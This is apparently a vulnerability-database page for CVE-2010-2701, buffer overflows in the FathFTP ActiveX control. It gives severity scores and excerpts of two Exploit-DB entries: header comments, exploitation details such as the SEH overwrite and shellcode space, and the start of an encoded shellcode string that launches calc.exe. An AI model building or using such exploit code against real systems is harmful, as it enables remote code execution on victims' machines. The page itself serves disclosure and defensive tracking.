CVE-2010-2701
Published 2010-07-12
Priority P347 · critical · 9.3 · CVSS 2.0
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 5.06% (91.2th percentile)
Multiple buffer overflows in the FathFTP ActiveX control 1.7 allow remote attackers to execute arbitrary code via (1) the GetFromURL member or (2) a long argument to the RasIsConnected method.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fathsoft | fathftp | — | — |
No detection rules found.
Exploit-DB
FathFTP 1.8 - 'RasIsConnected Method' ActiveX Buffer Overflow (SEH)
exploitdb·2010-08-03
---
' Exploit Title: FathFTP 1.8 (SEH) ActiveX Buffer Overflow
' Author: MadjiX
' Software Link: http://www.fathsoft.com/fathftp.html
' Version 1.7 : http://www.exploit-db.com/exploits/14269/ (Thanks Blake)
' Tested on: Windows XP SP3 FR / IE6
' Visit : www.sec4ever.com
' EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%4
Exploit-DB
FathFTP 1.7 - ActiveX Buffer Overflow
exploitdb·2010-07-08
---
' Exploit Title: FathFTP 1.7 ActiveX Buffer Overflow
' Date: July 7, 2010
' Author: Blake
' Software Link: http://www.softpedia.com/get/Programming/Components-Libraries/FathFTP.shtml
' Version: 1.7
' Tested on: Windows XP SP3 / IE6
' Note: The GetFromURL member is also vulnerable to a stack overflow (EIP overwrite).
' 6784 bytes of shellcode space
' EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2
No writeups or analysis indexed.